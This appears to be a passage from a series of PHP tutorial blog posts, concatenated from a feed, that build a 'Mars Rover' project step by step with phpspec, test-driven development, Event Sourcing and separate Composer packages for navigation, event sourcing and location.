private $eventStore;
public function __construct(
AnEventHappened $anEventHappened,
EventStore $eventStore
) {
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(LandRover $landRover)
{
$location = $landRover->getLocation();
$coordinates = $location->getCoordinates();
$orientation = $location->getOrientation();
$roverLanded = $this->anEventHappened->justNow(Events::ROVER_LANDED, [
'x' => $coordinates->getX(),
'y' => $coordinates->getY(),
'orientation' => $orientation->get(),
]);
$this->eventStore->log($roverLanded);
}
}
Let's check the tests:
vendor/bin/phpspec run
All green! That should be enough to commit:
git add -A
git commit -m '5: Used Location in LandRover'
While we've been playing with the notion of Location since the very first
use case, it's only now that we really need it that we created it.
It encapsulates X and Y coordinates as well as an orientation.
Location is currently in the navigation package, but we also need it in
the location package... To fix this we have the following solutions:
navigation as a dependency of locationnavigation and locationgeolocation package, with Location, Coordinates and
OrientationSince we want to keep navigation and location separate, we'll opt for the
third option and create this new package in the next article.
We've already developed the first use case about landing the rover on mars, and the second one about driving it. We're now developing the last one, requesting its location:
Mars rover will be requested to give its current location (
xandycoordinates and the orientation).
In this article we're going to create the locating logic:
cd packages/location
git checkout 5-location
As usual, we're going to use our Command Bus twist:
However in this case we don't have any input parameters: we only want the
location of the rover. So do we really need to create an empty LocateRover
class?
If in the future we want to handle many rovers (a Rover name or ID parameter) or if we want to know the location of a rover at a given time (time parameter), then having this empty class can make sense: we can then fill it later.
However, in this tutorial anyway, we don't have such a need so we can be pragmatic about it and just omit it.
Let's start straight away by creating the LocateRoverHandler. We're starting
by bootstraping the test class:
vendor/bin/phpspec describe 'MarsRover\Location\LocateRoverHandler'
This should create the following
spec/MarsRover/Location/LocateRoverHandlerSpec.php file:
<?php
namespace spec\MarsRover\Location;
use MarsRover\Location\LocateRoverHandler;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class LocateRoverHandlerSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(LocateRoverHandler::class);
}
}
We'll need a service which is able to replay all the landing and driving events
to compute the latest location of the rover. Let's call it FindLatestLocation.
Or maybe it'd be faster if we computed that latest location on the go, while
we receive each landing and driving event? In that case our FindLatestLocation
would just need to retrieve those values from a sort of cache.
It sounds like we can have many ways of finding the rover location, and commiting to one right now only to find out later that another implementation was better would be a shame. So let's delay our decision and rely on an interface for now:
<?php
namespace spec\MarsRover\Location;
use MarsRover\Location\Service\FindLatestLocation;
use PhpSpec\ObjectBehavior;
class LocateRoverHandlerSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = 'north';
const LOCATION = [
'x' => self::X,
'y' => self::Y,
'orientation' => self::ORIENTATION,
];
function it_finds_a_rover_latest_location(
FindLatestLocation $findLatestLocation
) {
$this->beConstructedWith($findLatestLocation);
$findLatestLocation->find()->willReturn(self::LOCATION);
$this->handle()->shouldBe(self::LOCATION);
}
}
It might be our smallest Handler of all. Since it only uses one service, we
might start wondering if it was worth to have a handler at all (we could just
use the FindLatestLocation service directly), after all we did skip the
Command for similar reasons.
However, if we throw away our handler, we'll lose our "automated use case documentation": the service is an interface and cannot be tested. So let's keep it. Let's run the tests now:
vendor/bin/phpspec run
They fail because LocateRoverHandler doesn't exist, but phpspec bootstrapped
it for us in the src/MarsRover/Location/LocateRoverHandler.php file:
<?php
namespace MarsRover\Location;
use MarsRover\Location\Service\FindLatestLocation;
class LocateRoverHandler
{
private $findLatestLocation;
public function __construct(FindLatestLocation $findLatestLocation)
{
$this->findLatestLocation = $findLatestLocation;
}
public function handle()
{
}
}
Thanks to the SpecGen extension, phpspec was able to detect Dependency Injection, and bootstrapped a constructor with an attribute initialization for us. How nice!
We'll just need to complete the handle method:
<?php
namespace MarsRover\Location;
use MarsRover\Location\Service\FindLatestLocation;
class LocateRoverHandler
{
private $findLatestLocation;
public function __construct(FindLatestLocation $findLatestLocation)
{
$this->findLatestLocation = $findLatestLocation;
}
public function handle()
{
return $this->findLatestLocation->find();
}
}
Overall, the code looks very similar to the test. Let's run them again:
vendor/bin/phpspec run
All green! We can commit our work:
git add -A
git commit -m '5: Created LocateRoverHandler'
Locating the rover is as simple as retrieving it from somewhere. We've delegated the decision on where this "somewhere" is because there are many valid solutions (replaying all the events from the EventStore, a cache, etc).
Delegating those decisions can be done by creating an interface, it allows us to create as many implementations as we want, without having to modify the logic we've just written.
The Test Driven Development cycle wouldn't be complete without a refactoring
step. In the next article we'll create a Location value object, to make our
FindLatestLocation and LocateRoverHandler classes return something more
explicit.
We've already developed the first use case about landing the rover on mars, and the second one about driving it. We're now going to start developing the last one, requesting its location:
Mars rover will be requested to give its current location (
xandycoordinates and the orientation).
In this article we're going to create a new package for the location logic.
Until now we've been putting our Landing and Driving code in the navigation
package. It's a "write" type of logic: an event occurs and we log it in the
Event Store.
On the other hand, requesting the location of the rover is a "read" type of logic, since we've decided to follow the CQRS principle we're going to separate them and put it in its own package.
The benefit of this approach can become more apparent if we decide to create web APIs to control our Mars Rover and replicate the data accross multiple servers: we could put the "write" endpoints on a single "Publishing" server, and then put the "read" endpoints on many "Subsriber" servers.
The "Subscriber" servers only need to synchronize their data with the "Publisher" server, allowing us to scale.
location packageWe can start by creating the directory:
git checkout -b 5-location
mkdir -p packages/location
cd packages/location
Composer needs us to set up the package by creating a composer.json file:
{
"name": "mars-rover/location",
"license": "MIT",
"type": "library",
"description": "Mars Rover - Location",
"autoload": {
"psr-4": { "MarsRover\\Location\\": "src/MarsRover/Location" }
},
"require": {
"php": "^7.0"
},
"require-dev": {
"memio/spec-gen": "^0.6"
}
}
We've decided to use phpspec as a test framework, and
to get the most of it we'd like to use its SpecGen
extension. To do so we need to create the phpspec.yml.dist file:
extensions:
Memio\SpecGen\MemioSpecGenExtension: ~
Note: For more information about phpspec see this article.
Finally, we can configure this package's git by creating a .gitignore file:
# Configuration
/phpspec.yml
# Third Party libraries
/vendor/
/composer.lock
With this we've finished creating our package. We can run Composer:
composer install --optimize-autoloader
That should be enough for a first commit:
git add -A
git commit -m '5: Created Location package'
location to the projectLet's go back to the project's root:
cd ../../
All we need to do is to add a new line in the require section of our
composer.json file:
{
"name": "mars-rover/mars-rover",
"license": "MIT",
"type": "project",
"description": "Mars Rover",
"repositories": [
{
"type": "path",
"url": "./packages/*"
}
],
"require": {
"mars-rover/event-sourcing": "*@dev",
"mars-rover/location": "*@dev",
"mars-rover/navigation": "*@dev",
"php": "^7.0"
},
"require-dev": {
"phpspec/phpspec": "^3.0"
}
}
Actually, we also need to add a new section in phpspec.yml.dist:
suites:
event-sourcing:
namespace: 'MarsRover\EventSourcing'
src_path: packages/event-sourcing/src
spec_path: packages/event-sourcing
location:
namespace: 'MarsRover\Location'
src_path: packages/location/src
spec_path: packages/location
navigation:
namespace: 'MarsRover\Navigation'
src_path: packages/navigation/src
spec_path: packages/navigation
And that's it! We are now able to run Composer and then phpspec:
composer update --optimize-autoloader
vendor/bin/phpspec run
That should be enough for a second commit:
git add -A
git commit -m '5: Added location package to main project'
In order to keep the "write" logic in the navigation package separated
from the "read" logic, we've created a new location package.
In the next article, we'll start creating the LocateDriverHandler class.
We've already developed the first use case about landing the rover on mars, and we've started the second one about driving it:
Once a rover has been landed on Mars it is possible to drive them, using instructions such as
move_forward(keeps orientation, but moves along thexoryaxis) orturn_left/turn_right(keeps the same coordinates, but changes the orientation).
In this article we're going to create the actual driving logic, using Event Sourcing:
cd packages/navigation
git checkout 4-driving
Following our Command Bus twist,
we're now going to create the DriveRoverHandler class that's going to take
care of the actual logic associated to the DriveRover use case. We're
starting by bootstraping the test class:
vendor/bin/phpspec describe 'MarsRover\Navigation\DriveRoverHandler'
This should create the following
spec/MarsRover/Navigation/DriveRoverHandlerSpec.php file:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\DriveRoverHandler;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class DriveRoverHandlerSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(DriveRoverHandler::class);
}
}
Event Sourcing is
all about recording significant actions. Driving a rover seems significant
enough, so that's what DriveRoverHandler should do:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\EventSourcing\AnEventHappened;
use MarsRover\EventSourcing\Event;
use MarsRover\EventSourcing\EventStore;
use MarsRover\Navigation\DriveRover;
use MarsRover\Navigation\Instruction;
use PhpSpec\ObjectBehavior;
class DriveRoverHandlerSpec extends ObjectBehavior
{
const DRIVING_INSTRUCTION = Instruction::MOVE_FORWARD;
const EVENT_NAME = 'rover_driven';
const EVENT_DATA = [
'instruction' => self::DRIVING_INSTRUCTION,
];
function it_drives_a_rover_with_given_instruction(
AnEventHappened $anEventHappened,
Event $roverDriven,
EventStore $eventStore
) {
$this->beConstructedWith($anEventHappened, $eventStore);
$driveRover = new DriveRover(
self::DRIVING_INSTRUCTION
);
$anEventHappened->justNow(
self::EVENT_NAME,
self::EVENT_DATA
)->willReturn($roverDriven);
$eventStore->log($roverDriven)->shouldBeCalled();
$this->handle($driveRover);
}
}
It's very similar to what we've done for LandRoverHandler, all we've done
is create and event specific to driving the rover with its instructions
and "logged" it in an `EventStore. Let's run the tests:
vendor/bin/phpspec run
They fail because DriveRoverHandler doesn't exists, but phpspec bootstrapped
it for us in the src/MarsRover/Navigation/DriveRoverHandler.php file:
<?php
namespace MarsRover\Navigation;
use MarsRover\EventSourcing\AnEventHappened;
use MarsRover\EventSourcing\EventStore;
class DriveRoverHandler
{
private $anEventHappened;
private $eventStore;
public function __construct(AnEventHappened $anEventHappened, EventStore $eventStore)
{
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(DriveRover $driveRover)
{
}
}
Thanks to the SpecGen extension, phpspec was able to detect Dependency Injection, and bootstrapped a constructor with an attribute initialization for us. How nice!
We'll just need to complete the handle method:
<?php
namespace MarsRover\Navigation;
use MarsRover\EventSourcing\{
AnEventHappened,
EventStore
};
class DriveRoverHandler
{
const EVENT_NAME = 'rover_driven';
private $anEventHappened;
private $eventStore;
public function __construct(
AnEventHappened $anEventHappened,
EventStore $eventStore
) {
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(DriveRover $driveRover)
{
$roverDriven = $this->anEventHappened->justNow(self::EVENT_NAME, [
'instruction' => $driveRover->getInstruction()->get(),
]);
$this->eventStore->log($roverDriven);
}
}
Overall, the code looks very similar to the test. Let's run them again:
vendor/bin/phpspec run
All green! We're going to do a quick refactoring to move the event name in
the src/MarsRover/Navigation/Events.php file:
<?php
namespace MarsRover\Navigation;
class Events
{
const ROVER_LANDED = 'rover_landed';
const ROVER_DRIVEN = 'rover_driven';
}
Then use it in the code:
<?php
namespace MarsRover\Navigation;
use MarsRover\EventSourcing\{
AnEventHappened,
EventStore
};
class DriveRoverHandler
{
private $anEventHappened;
private $eventStore;
public function __construct(
AnEventHappened $anEventHappened,
EventStore $eventStore
) {
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(DriveRover $driveRover)
{
$roverDriven = $this->anEventHappened->justNow(Events::ROVER_DRIVEN, [
'instruction' => $driveRover->getInstruction()->get(),
]);
$this->eventStore->log($roverDriven);
}
}
and finally in the test:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\EventSourcing\AnEventHappened;
use MarsRover\EventSourcing\Event;
use MarsRover\EventSourcing\EventStore;
use MarsRover\Navigation\DriveRover;
use MarsRover\Navigation\Events;
use MarsRover\Navigation\Instruction;
use PhpSpec\ObjectBehavior;
class DriveRoverHandlerSpec extends ObjectBehavior
{
const DRIVING_INSTRUCTION = Instruction::MOVE_FORWARD;
const EVENT_NAME = Events::ROVER_DRIVEN;
const EVENT_DATA = [
'instruction' => self::DRIVING_INSTRUCTION,
];
function it_drives_a_rover_with_given_instruction(
AnEventHappened $anEventHappened,
Event $roverDriven,
EventStore $eventStore
) {
$this->beConstructedWith($anEventHappened, $eventStore);
$driveRover = new DriveRover(
self::DRIVING_INSTRUCTION
);
$anEventHappened->justNow(
self::EVENT_NAME,
self::EVENT_DATA
)->willReturn($roverDriven);
$eventStore->log($roverDriven)->shouldBeCalled();
$this->handle($driveRover);
}
}
We can run the tests one last time:
vendor/bin/phpspec run
Still green! We can commit our work:
git add -A
git commit -m '4: Created DriveRoverHandler'
git checkout master
git merge --no-ff 4-driving
With Event Sourcing, the logic associated to our "Driving a Rover on Mars" use case is quite simple: we just record it as an event.
In the next article, we'll create a new package to take care of the last use case: "Requesting the Rover's location".
]]>We've already developed the first use case about landing the rover on mars, and we've started the second one about driving it:
Once a rover has been landed on Mars it is possible to drive them, using instructions such as
move_forward(keeps orientation, but moves along thexoryaxis) orturn_left/turn_right(keeps the same coordinates, but changes the orientation).
In this article we're going to refactor DriveRover:
cd packages/navigation
git checkout -b 4-driving
By having a look at DriveRover, we can guess that it has 1 reason to change:
the list of instruction might grow bigger.
This hints toward one new class: Instruction. Let's get cracking!
First let's bootstrap the test class using phpspec:
vendor/bin/phpspec describe 'MarsRover\Navigation\Instruction'
This will create the following spec/MarsRover/Navigation/InstructionSpec.php
file:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Instruction;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class InstructionSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(Instruction::class);
}
}
We can edit it reusing what we've done in DriveRover test class, only with
more information about the possible instruction:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class InstructionSpec extends ObjectBehavior
{
const MOVE_FORWARD = 'move_forward';
const TURN_LEFT = 'turn_left';
const TURN_RIGHT = 'turn_right';
const INVALID_INSTRUCTION = 'wake_up_polly_parrot';
function it_can_be_move_forward()
{
$this->beConstructedWith(self::MOVE_FORWARD);
$this->get()->shouldBe(self::MOVE_FORWARD);
}
function it_can_be_turn_left()
{
$this->beConstructedWith(self::TURN_LEFT);
$this->get()->shouldBe(self::TURN_LEFT);
}
function it_can_be_turn_right()
{
$this->beConstructedWith(self::TURN_RIGHT);
$this->get()->shouldBe(self::TURN_RIGHT);
}
function it_cannot_be_anything_else()
{
$this->beConstructedWith(self::INVALID_INSTRUCTION);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
}
Since this test is dedicated to instructions, we feel more free than in
DriveRover to describe all the possible instructions. If we run the tests
now, phpspec will bootstrap the Instruction class for us:
vendor/bin/phpspec run
Indeed, it created the src/MarsRover/Navigation/Instruction.php file:
<?php
namespace MarsRover\Navigation;
class Instruction
{
public function __construct($argument)
{
}
public function get()
{
}
}
All that's left for us to do is complete it, we can reuse the code in
DriveRover:
<?php
namespace MarsRover\Navigation;
class Instruction
{
const MOVE_FORWARD = 'move_forward';
const TURN_LEFT = 'turn_left';
const TURN_RIGHT = 'turn_right';
const VALID_INSTRUCTIONS = [
self::MOVE_FORWARD,
self::TURN_LEFT,
self::TURN_RIGHT,
];
private $instruction;
public function __construct($instruction)
{
if (false === in_array($instruction, self::VALID_INSTRUCTIONS, true)) {
throw new \InvalidArgumentException(
'Instruction should be one of: '
.implode(', ', self::VALID_INSTRUCTIONS)
);
}
$this->instruction = $instruction;
}
public function get() : string
{
return $this->instruction;
}
}
We can now run the tests:
vendor/bin/phpspec run
All green! Instruction is ready to be used in DriveRover, so let's update
its test:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Instruction;
use PhpSpec\ObjectBehavior;
class DriveRoverSpec extends ObjectBehavior
{
const DRIVING_INSTRUCTION = Instruction::MOVE_FORWARD;
function it_has_a_driving_instruction()
{
$this->beConstructedWith(
self::DRIVING_INSTRUCTION
);
$this->getInstruction()->get()->shouldBe(self::DRIVING_INSTRUCTION);
}
}
We no longer need to check for invalid instructions as we trust Instruction
to take care of it for us. Now let's update its code:
<?php
namespace MarsRover\Navigation;
class DriveRover
{
private $instruction;
public function __construct($instruction)
{
$this->instruction = new Instruction($instruction);
}
public function getInstruction() : Instruction
{
return $this->instruction;
}
}
And that should make our tests pass:
vendor/bin/phpspec run
All green! We can refactor Instruction test class a bit, by reusing
Instruction constants:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Instruction;
use PhpSpec\ObjectBehavior;
class InstructionSpec extends ObjectBehavior
{
const MOVE_FORWARD = Instruction::MOVE_FORWARD;
const TURN_LEFT = Instruction::TURN_LEFT;
const TURN_RIGHT = Instruction::TURN_RIGHT;
const INVALID_INSTRUCTION = 'wake_up_polly_parrot';
function it_can_be_move_forward()
{
$this->beConstructedWith(self::MOVE_FORWARD);
$this->get()->shouldBe(self::MOVE_FORWARD);
}
function it_can_be_turn_left()
{
$this->beConstructedWith(self::TURN_LEFT);
$this->get()->shouldBe(self::TURN_LEFT);
}
function it_can_be_turn_right()
{
$this->beConstructedWith(self::TURN_RIGHT);
$this->get()->shouldBe(self::TURN_RIGHT);
}
function it_cannot_be_anything_else()
{
$this->beConstructedWith(self::INVALID_INSTRUCTION);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
}
Let's run the tests one last time:
vendor/bin/phpspec run
All grin ;) . That's enough for us to commit our work:
git add -A
git commit -m '4: Created Instruction'
We've refactored DriveRover by extracting an Instruction value object. It
allowed us to write more tests to describe all the possible values.
In the next article, we'll write the actual driving logic.
]]>We just finished developing the first use case, so we can now get cracking on the second one, Driving the rover:
Once a rover has been landed on Mars it is possible to drive them, using instructions such as
move_forward(keeps orientation, but moves along thexoryaxis) orturn_left/turn_right(keeps the same coordinates, but changes the orientation).
Again, we start by creating a class with the name of our use case. It will take care of doing a simple validation on the input provided by the user:
cd packages/navigation
git checkout -b 4-driving
Using phpspec, we bootstrap the test class:
vendor/bin/phpspec describe 'MarsRover\Navigation\DriveRover'
This should generate this spec/MarsRover/Navigation/DriveRoverSpec.php class:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\DriveRover;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class DriveRoverSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(DriveRover::class);
}
}
This leaves us the task of editing it to start describing input parameters:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class DriveRoverSpec extends ObjectBehavior
{
const DRIVING_INSTRUCTION = 'move_forward';
function it_has_a_driving_instruction()
{
$this->beConstructedWith(
self::DRIVING_INSTRUCTION
);
$this->getInstruction()->shouldBe(self::DRIVING_INSTRUCTION);
}
}
We can now run the tests:
vendor/bin/phpspec run
This will generate the src/MarsRover/Navigation/DriveRover.php file:
<?php
namespace MarsRover\Navigation;
class DriveRover
{
private $argument;
public function __construct($argument)
{
$this->argument = $argument;
}
public function getInstruction()
{
}
}
All we need to do is to edit it:
<?php
namespace MarsRover\Navigation;
class DriveRover
{
private $instruction;
public function __construct($instruction)
{
$this->instruction = $instruction;
}
public function getInstruction() : string
{
return $this->instruction;
}
}
Let's check the tests:
vendor/bin/phpspec run
All green! Now let's add some unhappy scenarios to our tests:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class DriveRoverSpec extends ObjectBehavior
{
const DRIVING_INSTRUCTION = 'move_forward';
const INVALID_DRIVING_INSTRUCTION = 'wake_up_polly_parrot';
function it_has_a_driving_instruction()
{
$this->beConstructedWith(
self::DRIVING_INSTRUCTION
);
$this->getInstruction()->shouldBe(self::DRIVING_INSTRUCTION);
}
function it_cannot_have_invalid_instruction()
{
$this->beConstructedWith(
self::INVALID_DRIVING_INSTRUCTION
);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
}
We can run the tests:
vendor/bin/phpspec run
They fail! So let's complete the code:
<?php
namespace MarsRover\Navigation;
class DriveRover
{
const VALID_INSTRUCTIONS = [
'move_forward',
'turn_left',
'turn_right',
];
private $instruction;
public function __construct($instruction)
{
if (false === in_array($instruction, self::VALID_INSTRUCTIONS, true)) {
throw new \InvalidArgumentException(
'Instruction should be one of: '
.implode(', ', self::VALID_INSTRUCTIONS)
);
}
$this->instruction = $instruction;
}
public function getInstruction() : string
{
return $this->instruction;
}
}
And re-run the tests:
vendor/bin/phpspec run
All green! We can now commit our work:
git add -A
git commit -m '4: Created DriveRover'
We've followed again the TDD methodology: write the test, then the code. We took care of describing first the happy scenario and then unhappy scenarios to cover all the cases.
We've also used the same twist on the Command Bus pattern: we created a Command class that describes the use case (drive the rover) and does a simple validation on the input.
In the next article, we'll proceed to the third step of TDD: refactoring
DriveRover by extracting Instruction in its own class.
Up until now, we've implemented the first use case, "Landing a rover on Mars":
Mars Rovers need first to be landed at a given position. A position is composed of coordinates (
xandy, which are both integers) and an orientation (a string being one ofnorth,east,westorsouth).
We've also created an event-sourcing package with the following interfaces:
Event, a Data Transfer Object (DTO) that contains the name and the dataAnEventHappened, which is actually an Event factoryEventStore, a service responsible for "logging" EventsIn this article, we're going to implement them.
Let's start by asking phpspec to generate the test class:
vendor/bin/phpspec describe 'MarsRover\EventSourcing\Event'
It should have generated the following
spec/MarsRover/EventSourcing/EventSpec.php file:
<?php
namespace spec\MarsRover\EventSourcing;
use MarsRover\EventSourcing\Event;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class EventSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(Event::class);
}
}
We're going to start writing test methods that describe what kind of data this DTO holds:
<?php
namespace spec\MarsRover\EventSourcing;
use PhpSpec\ObjectBehavior;
class EventSpec extends ObjectBehavior
{
const NAME = 'something_happened';
const DATA = [
'message' => 'We are the knights who say Ni!',
];
function let(\DateTime $receivedAt)
{
$this->beConstructedWith(
self::NAME,
self::DATA,
$receivedAt
);
}
function it_has_a_name()
{
$this->getName()->shouldBe(self::NAME);
}
function it_has_data()
{
$this->getData()->shouldBe(self::DATA);
}
function it_has_been_received_at_a_date_and_time(\DateTime $receivedAt)
{
$this->getReceivedAt()->shouldBe($receivedAt);
}
}
We can now run the tests to bootstrap the class:
vendor/bin/phpspec run
It will overwrite the existing src/MarsRover/EventSourcing/Event.php file:
<?php
namespace MarsRover\EventSourcing;
use DateTimeInterface;
class Event
{
public function __construct($argument1, array $argument2, DateTimeInterface $dateTime)
{
}
public function getName()
{
}
public function getData()
{
}
public function getReceivedAt()
{
}
}
We can edit it to make the tests pass:
<?php
namespace MarsRover\EventSourcing;
class Event
{
private $name;
private $data;
private $receivedAt;
public function __construct(
string $name,
array $data,
\DateTimeInterface $receivedAt
) {
$this->name = $name;
$this->data = $data;
$this->receivedAt = $receivedAt;
}
public function getName() : string
{
return $this->name;
}
public function getData() : array
{
return $this->data;
}
public function getReceivedAt() : \DateTimeInterface
{
return $this->receivedAt;
}
}
Let's check if everything is alright:
vendor/bin/phpspec run
And it is! Time to commit our work:
git add -A
git commit -m '3: Created Event'
The next class to implement is AnEventHappened. Let's create its test:
vendor/bin/phpspec describe 'MarsRover\EventSourcing\AnEventHappened'
It should generate the spec/MarsRover/EventSourcing/AnEventHappenedSpec.php
file:
<?php
namespace spec\MarsRover\EventSourcing;
use MarsRover\EventSourcing\AnEventHappened;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class AnEventHappenedSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(AnEventHappened::class);
}
}
We can start describing this factory by writing test methods:
<?php
namespace spec\MarsRover\EventSourcing;
use MarsRover\EventSourcing\Event;
use PhpSpec\ObjectBehavior;
class AnEventHappenedSpec extends ObjectBehavior
{
const NAME = 'something_happened';
const DATA = [
'message' => 'And now for something completly different',
];
function it_can_create_events()
{
$this->justNow(self::NAME, self::DATA)->shouldHaveType(Event::class);
}
}
Running the tests will generate the class:
vendor/bin/phpspec run
It should have overwritten the
src/MarsRover/EventSourcing/AnEventHappened.php file with:
<?php
namespace MarsRover\EventSourcing;
class AnEventHappened
{
public function justNow($argument1, $argument2)
{
}
}
We can now complete it:
<?php
namespace MarsRover\EventSourcing;
class AnEventHappened
{
public function justNow(string $name, array $data) : Event
{
return new Event($name, $data, new \DateTime());
}
}
Let's run the tests:
vendor/bin/phpspec run
All green! Time to commit:
git add -A
git commit -m 'Created AnEventHappened'
We replaced the generated interfaces for AnEventHappened and Event with
classes, which have been tested.
EventStore could log events in a log file, or in a database, or send them as
messages to a queue to be treated later... For that reason we'll keep the
interface.
We're going to delay its implementations for later, when the rover will be almost done.
If we run the tests from the project's root, we'll see that it runs tests for
both navigation and event-sourcing in one go. This is one advantage of
MonoRepo: it makes it easy to make sure that changes in a package don't break
the other that depend on it.
We can now merge our branch:
cd ../../
git checkout master
git merge --no-ff 3-event-sourcing
In the next article we'll start developing the second use case: Driving the rover.
]]>Up until now, we've implemented the first use case, "Landing a rover on Mars":
Mars Rovers need first to be landed at a given position. A position is composed of coordinates (
xandy, which are both integers) and an orientation (a string being one ofnorth,east,westorsouth).
In order to do so, we've:
In the last article, we wrote some Event Sourcing code:
Event, a Data Transfer Object (DTO) that contains the name and the dataAnEventHappened, which is actually an Event factoryEventStore, a service responsible for "logging" EventsIn this article, we're going to extract them from the navigation package and
put them in their own event-sourcing package.
event-sourcing packageWe can start by creating the directory:
git checkout -b 3-event-sourcing
mkdir -p packages/event-sourcing
cd packages/event-sourcing
Composer needs us to set up the package by creating a composer.json file:
{
"name": "mars-rover/event-sourcing",
"license": "MIT",
"type": "library",
"description": "Mars Rover - Event Sourcing",
"autoload": {
"psr-4": { "MarsRover\\EventSourcing\\": "src/MarsRover/EventSourcing" }
},
"require": {
"php": "^7.0"
},
"require-dev": {
"memio/spec-gen": "^0.6"
}
}
We've decided to use phpspec as a test framework, and
to get the most of it we'd like to use its SpecGen
extension. To do so we need to create the phpspec.yml.dist file:
extensions:
Memio\SpecGen\MemioSpecGenExtension: ~
Note: For more information about phpspec see this article.
Finally, we can configure this package's git by creating a .gitignore file:
# Configuration
/phpspec.yml
# Third Party libraries
/vendor/
/composer.lock
With this we've finished creating our package. We can run Composer:
composer install --optimize-autoloader
That should be enough for a second commit:
git add -A
git commit -m '3: Created Event Sourcing package'
event-sourcing to the projectLet's go back to the project's root:
cd ../../
All we need to do is to add a new line in the require section of our
composer.json file:
{
"name": "mars-rover/mars-rover",
"license": "MIT",
"type": "project",
"description": "Mars Rover",
"repositories": [
{
"type": "path",
"url": "./packages/*"
}
],
"require": {
"mars-rover/event-sourcing": "*@dev",
"mars-rover/navigation": "*@dev",
"php": "^7.0"
},
"require-dev": {
"phpspec/phpspec": "^3.0@beta"
}
}
Actually, we also need to add a new section in phpspec.yml.dist:
suites:
event-sourcing:
namespace: 'MarsRover\EventSourcing'
src_path: packages/event-sourcing/src
spec_path: packages/event-sourcing
navigation:
namespace: 'MarsRover\Navigation'
src_path: packages/navigation/src
spec_path: packages/navigation
And that's it! We are now able to run Composer and then phpspec:
composer update --optimize-autoloader
vendor/bin/phpspec run
That should be enough for a second commit:
git add -A
git commit -m '3: Added event-sourcing package to main project'
It's now time to move Event Sourcing files from navigation to
event-sourcing:
cd packages/event-sourcing
mkdir -p src/MarsRover/EventSourcing
mv ../navigation/src/MarsRover/Navigation/{EventStore.php,Event.php,AnEventHappened.php} ./src/MarsRover/EventSourcing/
We then need to change namespaces:
sed -i 's/Navigation/EventSourcing/g' ./src/MarsRover/EventSourcing/*
To continue those namespace changes we'll have to move back to the navigation
package:
cd ../navigation
Then rename the namespaces:
sed -i 's/Navigation\\Event;/EventSourcing\\Event;/g' ./spec/MarsRover/Navigation/*
sed -i 's/Navigation\\EventStore;/EventSourcing\\EventStore;/g' ./spec/MarsRover/Navigation/*
sed -i 's/Navigation\\AnEventHappened;/EventSourcing\\AnEventHappened;/g' ./spec/MarsRover/Navigation/*
We'll also need to add use statements to
./src/MarsRover/Navigation/LandRoverHandler.php:
<?php
namespace MarsRover\Navigation;
use MarsRover\EventSourcing\{
AnEventHappened,
EventStore
};
class LandRoverHandler
{
private $anEventHappened;
private $eventStore;
public function __construct(
AnEventHappened $anEventHappened,
EventStore $eventStore
) {
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(LandRover $landRover)
{
$roverLanded = $this->anEventHappened->justNow(Events::ROVER_LANDED, [
'x' => $landRover->getCoordinates()->getX(),
'y' => $landRover->getCoordinates()->getY(),
'orientation' => $landRover->getOrientation()->get(),
]);
$this->eventStore->log($roverLanded);
}
}
Since navigation now relies on event-sourcing classes, we need to add it in
composer.json:
{
"name": "mars-rover/navigation",
"license": "MIT",
"type": "library",
"description": "Mars Rover - Navigation",
"autoload": {
"psr-4": { "MarsRover\\Navigation\\": "src/MarsRover/Navigation" }
},
"repositories": [
{
"type": "path",
"url": "../*"
}
],
"require": {
"mars-rover/event-sourcing": "*@dev",
"php": "^7.0"
},
"require-dev": {
"memio/spec-gen": "^0.6"
}
}
As we can see, it's quite similar to what we've done in the project's root:
we've added a repositories section with the path to packages (../) and
then added mars-rover/event-sourcing to the require section, with the
version *@dev (any version, including unstable ones).
We are now able to run Composer:
composer update --optimize-autoloader
Let's run the tests:
vendor/bin/phpspec run
All green! We can now succesfully commit our new package:
cd ../../
git add -A
git commit -m '3: Moved Event Sourcing classes to their own package'
We identified AnEventHappened, Event and EventStore as objects that
could be in their own package, so we created event-sourcing and moved them
in it. This also meant we had to add this package to the project's root and to
navigation.
In the next article, we'll implement AnEventHappened and Event.
Previously we've created a
navigation package, and in it
a LandRover class that
validates input parameters for our
first use case:
Mars Rovers need first to be landed at a given position. A position is composed of coordinates (
xandy, which are both integers) and an orientation (a string being one ofnorth,east,westorsouth).
We've then refactored it to extract coordinates and orientation in their own classes.
In this article we're going to create the actual landing logic, using Event Sourcing:
cd packages/navigation
git checkout 2-landing
Following our Command Bus twist,
we're now going to create the LandRoverHandler class that's going to take
care of the actual logic associated to the LandRover use case. We're starting
by bootstraping the test class:
